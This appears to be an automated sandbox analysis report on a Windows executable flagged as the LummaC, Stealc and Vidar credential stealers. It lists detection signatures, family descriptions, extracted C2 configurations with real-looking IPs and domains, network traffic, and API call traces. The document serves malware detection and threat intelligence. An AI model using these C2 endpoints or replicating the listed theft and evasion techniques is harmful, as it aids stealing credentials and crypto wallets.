Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523816
MD5: dfd320ab72a577bcadcfd172f92d17b2
SHA1: 93050cf3a0756713427d95fd588a471ad2b5c1df
SHA256: 942b0ba35652330e8701f18d7208e4ae9773d71d7e464375f0366c576e8d196b
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: http://46.8.231.109/ URL Reputation: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll URL Reputation: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll URL Reputation: Label: malware
Found malware configuration
Source: 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "7fb8096dba7218243f8f6f7a994751d3"}
Source: 15.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
Source: 9.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["questionsmw.stor", "mysterisop.site", "soldiefieop.site", "treatynreit.site", "absorptioniw.site", "snarlypagowo.site", "abnomalrkmu.site", "chorusarorp.site"], "Build id": "H8NgCl--"}
Multi AV Scanner detection for domain / URL
Source: gravvitywio.store Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\GDBFCGIIIJ.exe ReversingLabs: Detection: 34%
Source: C:\ProgramData\IIJKJDAFHJ.exe ReversingLabs: Detection: 42%
Source: C:\ProgramData\KJEGDBKFIJ.exe ReversingLabs: Detection: 34%
Source: C:\Users\userAFIDGDBGCA.exe ReversingLabs: Detection: 34%
Source: C:\Users\userBAAAAKJKJE.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66fbfcc301a31_swws[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66fbfcc9963ca_ldfsna[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66fbfccd837ac_vadggdsa[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66fbfcc9963ca_ldfsna[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66fbfccd837ac_vadggdsa[1].exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: absorptioniw.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: mysterisop.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: snarlypagowo.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: treatynreit.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: chorusarorp.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: abnomalrkmu.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: soldiefieop.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: questionsmw.stor
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: chorusarorp.site
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: TeslaBrowser/5.5
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: - Screen Resoluton:
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: - Physical Installed Memory:
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: Workgroup: -
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: H8NgCl--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 2_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 2_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C116C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 2_2_6C116C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.77.132:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.152.190:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.77.132:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.152.190:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.15.dr
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2404569531.000000006C17D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.15.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2391775169.0000000038294000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.15.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2378816613.000000002C3B4000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.15.dr, msvcp140.dll.2.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2407833622.000000006C33F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2366338106.0000000020048000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2757991017.000000001FD6B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2603682116.000000002270B000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2404569531.000000006C17D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.15.dr, softokn3.dll.2.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose, 2_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 2_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 2_2_0040CD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h 9_2_00444040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp+08h], ecx 9_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 9_2_0041B000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], dx 9_2_004210D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 9_2_0041508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp+50h], 00000000h 9_2_0041508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 9_2_004480A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 9_2_004300B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00429140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000688h] 9_2_0041D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h 9_2_0041F1D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 9_2_0044518B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp+18h], 3602043Ah 9_2_0042F1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 9_2_00427250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 9_2_00427250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx esi, byte ptr [edx+eax-01h] 9_2_0040C210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh] 9_2_0040C210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp+34h], edx 9_2_004012F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], ax 9_2_0042A280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 9_2_00414294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_0042D295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 9_2_0042D295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+20h] 9_2_00416319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx], al 9_2_00433335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00433335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then dec ebx 9_2_0043F3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx ecx, word ptr [edi] 9_2_0042A3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+14h] 9_2_0042A3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], dx 9_2_004214D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_0042D4D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 9_2_0042D4D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h 9_2_0043F4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh 9_2_0043F4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], dx 9_2_004214EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 9_2_00416574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 9_2_0042C510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx], al 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00431670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+000000D0h] 9_2_0041D672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh 9_2_00447630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp al, 2Eh 9_2_0042C6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_0042C6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebx, eax 9_2_0040A680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebp, eax 9_2_0040A680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 9_2_004416A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+000000D0h] 9_2_0041D733
